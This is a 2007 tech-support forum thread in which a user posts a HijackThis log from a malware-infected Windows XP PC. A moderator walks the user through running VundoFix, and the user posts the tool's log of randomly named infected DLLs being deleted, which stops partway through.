Piriform Forum
Return to Piriform  CCleaner  Defraggler  Recuva  Speccy

Welcome Guest ( Log In | Register )

2 Pages V   1 2 >  
 Reply to this topicStart new topic
> Buchi Log
Buchi
post Feb 4 2007, 10:23 AM
Post #1


Member
**

Group: Members
Posts: 16
Joined: 4-February 07
Member No.: 10,964
Thanks for the clarification rolleyes.gif , below is my HIJACKTHIS LOG file. Please check and tell me the corrections:

Logfile of HijackThis v1.99.1
Scan saved at 3:49:40 PM, on 2/4/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolvc.exe
C:\WINDOWS\sm56hlpr.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\Spyware Nuker\swnxt.exe
C:\Program Files\GlobespanVirata\Adsl\dslstat.exe
C:\Program Files\GlobespanVirata\Adsl\dslagent.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\WINDOWS\System32\mysvcc.exe
C:\WINDOWS\system32\srrvc.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe
D:\Program Files\Skype\Phone\Skype.exe
C:\Program Files\SAMSUNG\Samsung Multimedia Keyboard\gpkbd.exe
C:\Program Files\Outlook Express\msimn.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\WINDOWS\System32\svcchost.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
F:\Zip\Anti-virus\HIJACKTHIS\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.microsoft.com/isapi/redir.dll?p...amp;ar=iesearch
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page =
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.microsoft.com/isapi/redir.dll?p...&ar=msnhome
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://us.rd.yahoo.com/customize/ie/defaul...rch/search.html
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.google.com/search?q=%s
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = iexplore
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: DAP Bar - {62999427-33FC-4baf-9C9C-BCE6BD127F08} - D:\Program Files\DAP\DAPIEBar.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [SMSERIAL] sm56hlpr.exe
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [SWN2] C:\Program Files\Spyware Nuker\swnxt.exe /h
O4 - HKLM\..\Run: [DSLSTATEXE] C:\Program Files\GlobespanVirata\Adsl\dslstat.exe icon
O4 - HKLM\..\Run: [DSLAGENTEXE] C:\Program Files\GlobespanVirata\Adsl\dslagent.exe
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [Adobe Photo Downloader] "C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [Routingdsfdsfs] winf454jhgfgk.exe
O4 - HKLM\..\Run: [mysvcig38] mysvcc.exe
O4 - HKLM\..\Run: [john315] C:\WINDOWS\system32\srrvc.exe
O4 - HKLM\..\Run: [msvcc25] svcchost.exe
O4 - HKLM\..\RunServices: [Routingdsfdsfs] winf454jhgfgk.exe
O4 - HKLM\..\RunServices: [mysvcig38] mysvcc.exe
O4 - HKLM\..\RunServices: [msvcc25] svcchost.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [Skype] "D:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [Routingdsfdsfs] winf454jhgfgk.exe
O4 - HKCU\..\Run: [john315] C:\WINDOWS\system32\srrvc.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Samsung Multimedia Keyboard.lnk = ?
O8 - Extra context menu item: &Download with &DAP - D:\PROGRA~1\DAP\dapextie.htm
O8 - Extra context menu item: &Yahoo! Search - file:///C:\Program Files\Yahoo!\Common/ycsrch.htm
O8 - Extra context menu item: Advanced Email Extractor - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html
O8 - Extra context menu item: Download &all with DAP - D:\PROGRA~1\DAP\dapextie2.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://D:\PROGRA~1\MICROS~1\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Scan link with AEE - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/link.html
O8 - Extra context menu item: Yahoo! &Dictionary - file:///C:\Program Files\Yahoo!\Common/ycdict.htm
O8 - Extra context menu item: Yahoo! &Maps - file:///C:\Program Files\Yahoo!\Common/ycmap.htm
O8 - Extra context menu item: Yahoo! &SMS - file:///C:\Program Files\Yahoo!\Common/ycsms.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Run DAP - {669695BC-A811-4A9D-8CDF-BA8C795F261C} - D:\PROGRA~1\DAP\DAP.EXE
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - D:\PROGRA~1\MICROS~1\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra button: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
O9 - Extra 'Tools' menuitem: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
O9 - Extra button: Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O9 - Extra 'Tools' menuitem: Advanced Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (YInstStarter Class) - C:\Program Files\Yahoo!\Common\yinsthelper.dll
O17 - HKLM\System\CCS\Services\Tcpip\..\{17BBF687-1141-4522-B007-EF63C7F4B7EE}: NameServer = 202.54.6.60,202.54.29.5
O17 - HKLM\System\CCS\Services\Tcpip\..\{7A1DA16E-B943-4E3A-A5A8-FF298FFD2041}: NameServer = 202.54.29.5 202.54.6.60
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
O23 - Service: Windows Host Services (DLLHOST32) - Unknown owner - C:\WINDOWS\system\dllhost.exe (file missing)
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPodService - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Microsoft Sata emulation (mside) - Unknown owner - C:\WINDOWS\system\mside.exe (file missing)
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe
O23 - Service: Windows Terminal Services - Unknown owner - C:\WINDOWS\system32\spoolvc.exe
Go to the top of the page
 
+Quote Post
rridgely
post Feb 4 2007, 04:46 PM
Post #2


I hate computers
Group Icon

Group: Moderators
Posts: 8,645
Joined: 12-April 05
Member No.: 1,352
Your computer is very infected. Your going to need some patience and time to get this fixed.

Please download VundoFix.exe
to your desktop.
  • Double-click VundoFix.exe to run it.
  • Click the Scan for Vundo button.
  • Once it's done scanning, click the Remove Vundo button.
  • You will receive a prompt asking if you want to remove the files, click YES
  • Once you click yes, your desktop will go blank as it starts removing Vundo.
  • When completed, it will prompt that it will reboot your computer, click OK.
  • Please post the contents of C:\vundofix.txt into your next reply
Note: It is possible that VundoFix encountered a file it could not remove.
In this case, VundoFix will run on reboot, simply follow the above
instructions starting from "Click the Scan for Vundo button." when
VundoFix appears at reboot.


--------------------
Having problems with spyware and viruses? If so then please follow the Spyware Removal Guide

Want to know how to protect your clean computer from viruses and spyware? The please follow the Malware Prevention Guide

Looking for good free security software?(or other great free stuff) The please take a look at the Recommended Security Applications Guide
Go to the top of the page
 
+Quote Post
Buchi
post Feb 5 2007, 11:56 AM
Post #3


Member
**

Group: Members
Posts: 16
Joined: 4-February 07
Member No.: 10,964
I followed your instructions, below is the vundoFix.txt file.
As you see below, "yudpdsvv.dll" couldn't not be removed after several tries sad.gif :
-----------------------------------------------------------------------------------
VundoFix V6.3.5

Checking Java version...

Java version is 1.5.0.8

Scan started at 4:26:01 PM 2/5/2007

Listing files found while scanning....

C:\WINDOWS\system32\atfrnque.dll
C:\WINDOWS\system32\awtqono.dll
C:\WINDOWS\system32\awtqooo.dll
C:\WINDOWS\system32\awtrolk.dll
C:\WINDOWS\system32\awtrrqp.dll
C:\WINDOWS\system32\awtssrr.dll
C:\WINDOWS\system32\awttuus.dll
C:\WINDOWS\system32\awtuurr.dll
C:\WINDOWS\system32\awtuusp.dll
C:\WINDOWS\system32\btjckfoc.dll
C:\WINDOWS\system32\byxwtts.dll
C:\WINDOWS\system32\byxxyaa.dll
C:\WINDOWS\system32\byxxyya.dll
C:\WINDOWS\system32\byxywvu.dll
C:\WINDOWS\system32\byxyxxw.dll
C:\WINDOWS\system32\cbxuspp.dll
C:\WINDOWS\system32\cbxutsq.dll
C:\WINDOWS\system32\cbxvtsp.dll
C:\WINDOWS\system32\cbxvwut.dll
C:\WINDOWS\system32\cbxwttq.dll
C:\WINDOWS\system32\cbxwwwv.dll
C:\WINDOWS\system32\cbxwxxy.dll
C:\WINDOWS\system32\cofkcjtb.ini
C:\WINDOWS\system32\ddcaaww.dll
C:\WINDOWS\system32\ddcbxut.dll
C:\WINDOWS\system32\ddcdcca.dll
C:\WINDOWS\system32\ddcdeec.dll
C:\WINDOWS\system32\ddcyaxy.dll
C:\WINDOWS\system32\efcbbba.dll
C:\WINDOWS\system32\efcdcyy.dll
C:\WINDOWS\system32\efcyywt.dll
C:\WINDOWS\system32\efcyywx.dll
C:\WINDOWS\system32\euqnrfta.ini
C:\WINDOWS\system32\fccaayv.dll
C:\WINDOWS\system32\fccayaw.dll
C:\WINDOWS\system32\fccbaxx.dll
C:\WINDOWS\system32\fcccyyx.dll
C:\WINDOWS\system32\fccyxxx.dll
C:\WINDOWS\system32\gebcdab.dll
C:\WINDOWS\system32\gebywuv.dll
C:\WINDOWS\system32\gebywxv.dll
C:\WINDOWS\system32\gebyxwt.dll
C:\WINDOWS\system32\gebyxxu.dll
C:\WINDOWS\system32\gebyxyy.dll
C:\WINDOWS\system32\hggedax.dll
C:\WINDOWS\system32\hggefcy.dll
C:\WINDOWS\system32\hggfdde.dll
C:\WINDOWS\system32\hggffcb.dll
C:\WINDOWS\system32\hggffgg.dll
C:\WINDOWS\system32\hggfgeb.dll
C:\WINDOWS\system32\hgggdab.dll
C:\WINDOWS\system32\hgggddc.dll
C:\WINDOWS\system32\hgggefe.dll
C:\WINDOWS\system32\hgggged.dll
C:\WINDOWS\system32\hgghiii.dll
C:\WINDOWS\system32\iifcaby.dll
C:\WINDOWS\system32\iifcbxw.dll
C:\WINDOWS\system32\iifdbxw.dll
C:\WINDOWS\system32\iiffcca.dll
C:\WINDOWS\system32\iifgeeb.dll
C:\WINDOWS\system32\jkkjheb.dll
C:\WINDOWS\system32\jkkjijk.dll
C:\WINDOWS\system32\jkkkjgf.dll
C:\WINDOWS\system32\jkkklmj.dll
C:\WINDOWS\system32\khfcawu.dll
C:\WINDOWS\system32\khfcdbc.dll
C:\WINDOWS\system32\khfdefd.dll
C:\WINDOWS\system32\khfedeb.dll
C:\WINDOWS\system32\khfeedc.dll
C:\WINDOWS\system32\khffcax.dll
C:\WINDOWS\system32\khfggfc.dll
C:\WINDOWS\system32\ljjgeda.dll
C:\WINDOWS\system32\ljjghhi.dll
C:\WINDOWS\system32\ljjhfec.dll
C:\WINDOWS\system32\mljgeef.dll
C:\WINDOWS\system32\mljhhhh.dll
C:\WINDOWS\system32\mljjhhe.dll
C:\WINDOWS\system32\mljjhig.dll
C:\WINDOWS\system32\mljjihg.dll
C:\WINDOWS\system32\mljjihh.dll
C:\WINDOWS\system32\mljkihi.dll
C:\WINDOWS\system32\nnnliif.dll
C:\WINDOWS\system32\nnnliij.dll
C:\WINDOWS\system32\nnnlkhe.dll
C:\WINDOWS\system32\nnnmkih.dll
C:\WINDOWS\system32\nnnmljg.dll
C:\WINDOWS\system32\nnnmnml.dll
C:\WINDOWS\system32\nnnnllj.dll
C:\WINDOWS\system32\nnnoono.dll
C:\WINDOWS\system32\nnnooop.dll
C:\WINDOWS\system32\nnnopmn.dll
C:\WINDOWS\System32\nqstv.bak1
C:\WINDOWS\System32\nqstv.bak2
C:\WINDOWS\System32\nqstv.ini
C:\WINDOWS\system32\opnkkji.dll
C:\WINDOWS\system32\opnliff.dll
C:\WINDOWS\system32\opnliig.dll
C:\WINDOWS\system32\opnmjig.dll
C:\WINDOWS\system32\opnmkli.dll
C:\WINDOWS\system32\opnmnmn.dll
C:\WINDOWS\system32\opnollk.dll
C:\WINDOWS\system32\opnoomk.dll
C:\WINDOWS\system32\opnoopm.dll
C:\WINDOWS\system32\pmnmnnl.dll
C:\WINDOWS\system32\qomjhfe.dll
C:\WINDOWS\system32\qomjjkk.dll
C:\WINDOWS\system32\qomkjge.dll
C:\WINDOWS\system32\qomljge.dll
C:\WINDOWS\system32\qommkij.dll
C:\WINDOWS\system32\qommnlm.dll
C:\WINDOWS\system32\qomnmnl.dll
C:\WINDOWS\system32\qomnnoo.dll
C:\WINDOWS\system32\rqromlm.dll
C:\WINDOWS\system32\rqromnk.dll
C:\WINDOWS\system32\rqroool.dll
C:\WINDOWS\system32\rqrpolj.dll
C:\WINDOWS\system32\rqrqrpm.dll
C:\WINDOWS\system32\rqrqrss.dll
C:\WINDOWS\system32\sgqdqaux.ini
C:\WINDOWS\system32\ssqnkhi.dll
C:\WINDOWS\system32\ssqnkki.dll
C:\WINDOWS\system32\ssqnnmn.dll
C:\WINDOWS\system32\ssqnolk.dll
C:\WINDOWS\system32\ssqolki.dll
C:\WINDOWS\system32\ssqomnl.dll
C:\WINDOWS\system32\ssqonmj.dll
C:\WINDOWS\system32\ssqoopm.dll
C:\WINDOWS\system32\ssqpmnk.dll
C:\WINDOWS\system32\ssqpmnm.dll
C:\WINDOWS\system32\ssqpopq.dll
C:\WINDOWS\system32\ssqpqqp.dll
C:\WINDOWS\system32\ssqqnkk.dll
C:\WINDOWS\system32\ssqqool.dll
C:\WINDOWS\system32\ssqrrop.dll
C:\WINDOWS\system32\tuvsttr.dll
C:\WINDOWS\system32\tuvurqr.dll
C:\WINDOWS\system32\tuvuuvw.dll
C:\WINDOWS\system32\tuvvsst.dll
C:\WINDOWS\system32\tuvvuvv.dll
C:\WINDOWS\system32\tuvvvww.dll
C:\WINDOWS\system32\tuvwurp.dll
C:\WINDOWS\system32\tuvwxxy.dll
C:\WINDOWS\system32\urqnlji.dll
C:\WINDOWS\system32\urqnllm.dll
C:\WINDOWS\system32\urqolii.dll
C:\WINDOWS\system32\urqpqnl.dll
C:\WINDOWS\system32\urqqqoo.dll
C:\WINDOWS\system32\urqrqqn.dll
C:\WINDOWS\System32\vtsqn.dll
C:\WINDOWS\system32\vturqrq.dll
C:\WINDOWS\system32\vturrom.dll
C:\WINDOWS\system32\vtusqrr.dll
C:\WINDOWS\system32\vtusrsq.dll
C:\WINDOWS\system32\vtusrss.dll
C:\WINDOWS\system32\vtuttqq.dll
C:\WINDOWS\system32\vtuurom.dll
C:\WINDOWS\system32\vtuuvtt.dll
C:\WINDOWS\system32\wvuroon.dll
C:\WINDOWS\system32\wvussqp.dll
C:\WINDOWS\system32\wvutqom.dll
C:\WINDOWS\system32\wvuurpm.dll
C:\WINDOWS\system32\wvuvwxy.dll
C:\WINDOWS\system32\xuaqdqgs.dll
C:\WINDOWS\system32\xxyvuts.dll
C:\WINDOWS\system32\xxywtst.dll
C:\WINDOWS\system32\xxywvwu.dll
C:\WINDOWS\system32\xxywwtt.dll
C:\WINDOWS\system32\xxyxxus.dll
C:\WINDOWS\system32\xxyyyxy.dll
C:\WINDOWS\system32\yayayab.dll
C:\WINDOWS\system32\yayvuur.dll
C:\WINDOWS\system32\yaywurs.dll
C:\WINDOWS\system32\yaywuuu.dll
C:\WINDOWS\system32\yayxwts.dll
C:\WINDOWS\system32\yayyxyy.dll
C:\WINDOWS\System32\yudpdsvv.dll

Beginning removal...

Attempting to delete C:\WINDOWS\system32\atfrnque.dll
C:\WINDOWS\system32\atfrnque.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\awtqono.dll
C:\WINDOWS\system32\awtqono.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\awtqooo.dll
C:\WINDOWS\system32\awtqooo.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\awtrolk.dll
C:\WINDOWS\system32\awtrolk.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\awtrrqp.dll
C:\WINDOWS\system32\awtrrqp.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\awtssrr.dll
C:\WINDOWS\system32\awtssrr.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\awttuus.dll
C:\WINDOWS\system32\awttuus.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\awtuurr.dll
C:\WINDOWS\system32\awtuurr.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\awtuusp.dll
C:\WINDOWS\system32\awtuusp.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\btjckfoc.dll
C:\WINDOWS\system32\btjckfoc.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\byxwtts.dll
C:\WINDOWS\system32\byxwtts.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\byxxyaa.dll
C:\WINDOWS\system32\byxxyaa.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\byxxyya.dll
C:\WINDOWS\system32\byxxyya.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\byxywvu.dll
C:\WINDOWS\system32\byxywvu.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\byxyxxw.dll
C:\WINDOWS\system32\byxyxxw.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\cbxuspp.dll
C:\WINDOWS\system32\cbxuspp.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\cbxutsq.dll
C:\WINDOWS\system32\cbxutsq.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\cbxvtsp.dll
C:\WINDOWS\system32\cbxvtsp.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\cbxvwut.dll
C:\WINDOWS\system32\cbxvwut.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\cbxwttq.dll
C:\WINDOWS\system32\cbxwttq.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\cbxwwwv.dll
C:\WINDOWS\system32\cbxwwwv.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\cbxwxxy.dll
C:\WINDOWS\system32\cbxwxxy.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\cofkcjtb.ini
C:\WINDOWS\system32\cofkcjtb.ini Has been deleted!

Attempting to delete C:\WINDOWS\system32\ddcaaww.dll
C:\WINDOWS\system32\ddcaaww.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ddcbxut.dll
C:\WINDOWS\system32\ddcbxut.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ddcdcca.dll
C:\WINDOWS\system32\ddcdcca.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ddcdeec.dll
C:\WINDOWS\system32\ddcdeec.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ddcyaxy.dll
C:\WINDOWS\system32\ddcyaxy.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\efcbbba.dll
C:\WINDOWS\system32\efcbbba.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\efcdcyy.dll
C:\WINDOWS\system32\efcdcyy.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\efcyywt.dll
C:\WINDOWS\system32\efcyywt.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\efcyywx.dll
C:\WINDOWS\system32\efcyywx.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\euqnrfta.ini
C:\WINDOWS\system32\euqnrfta.ini Has been deleted!

Attempting to delete C:\WINDOWS\system32\fccaayv.dll
C:\WINDOWS\system32\fccaayv.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\fccayaw.dll
C:\WINDOWS\system32\fccayaw.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\fccbaxx.dll
C:\WINDOWS\system32\fccbaxx.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\fcccyyx.dll
C:\WINDOWS\system32\fcccyyx.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\fccyxxx.dll
C:\WINDOWS\system32\fccyxxx.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\gebcdab.dll
C:\WINDOWS\system32\gebcdab.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\gebywuv.dll
C:\WINDOWS\system32\gebywuv.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\gebywxv.dll
C:\WINDOWS\system32\gebywxv.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\gebyxwt.dll
C:\WINDOWS\system32\gebyxwt.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\gebyxxu.dll
C:\WINDOWS\system32\gebyxxu.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\gebyxyy.dll
C:\WINDOWS\system32\gebyxyy.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\hggedax.dll
C:\WINDOWS\system32\hggedax.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\hggefcy.dll
C:\WINDOWS\system32\hggefcy.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\hggfdde.dll
C:\WINDOWS\system32\hggfdde.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\hggffcb.dll
C:\WINDOWS\system32\hggffcb.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\hggffgg.dll
C:\WINDOWS\system32\hggffgg.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\hggfgeb.dll
C:\WINDOWS\system32\hggfgeb.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\hgggdab.dll
C:\WINDOWS\system32\hgggdab.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\hgggddc.dll
C:\WINDOWS\system32\hgggddc.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\hgggefe.dll
C:\WINDOWS\system32\hgggefe.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\hgggged.dll
C:\WINDOWS\system32\hgggged.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\hgghiii.dll
C:\WINDOWS\system32\hgghiii.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\iifcaby.dll
C:\WINDOWS\system32\iifcaby.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\iifcbxw.dll
C:\WINDOWS\system32\iifcbxw.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\iifdbxw.dll
C:\WINDOWS\system32\iifdbxw.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\iiffcca.dll
C:\WINDOWS\system32\iiffcca.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\iifgeeb.dll
C:\WINDOWS\system32\iifgeeb.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\jkkjheb.dll
C:\WINDOWS\system32\jkkjheb.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\jkkjijk.dll
C:\WINDOWS\system32\jkkjijk.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\jkkkjgf.dll
C:\WINDOWS\system32\jkkkjgf.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\jkkklmj.dll
C:\WINDOWS\system32\jkkklmj.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\khfcawu.dll
C:\WINDOWS\system32\khfcawu.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\khfcdbc.dll
C:\WINDOWS\system32\khfcdbc.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\khfdefd.dll
C:\WINDOWS\system32\khfdefd.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\khfedeb.dll
C:\WINDOWS\system32\khfedeb.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\khfeedc.dll
C:\WINDOWS\system32\khfeedc.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\khffcax.dll
C:\WINDOWS\system32\khffcax.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\khfggfc.dll
C:\WINDOWS\system32\khfggfc.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ljjgeda.dll
C:\WINDOWS\system32\ljjgeda.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ljjghhi.dll
C:\WINDOWS\system32\ljjghhi.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ljjhfec.dll
C:\WINDOWS\system32\ljjhfec.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\mljgeef.dll
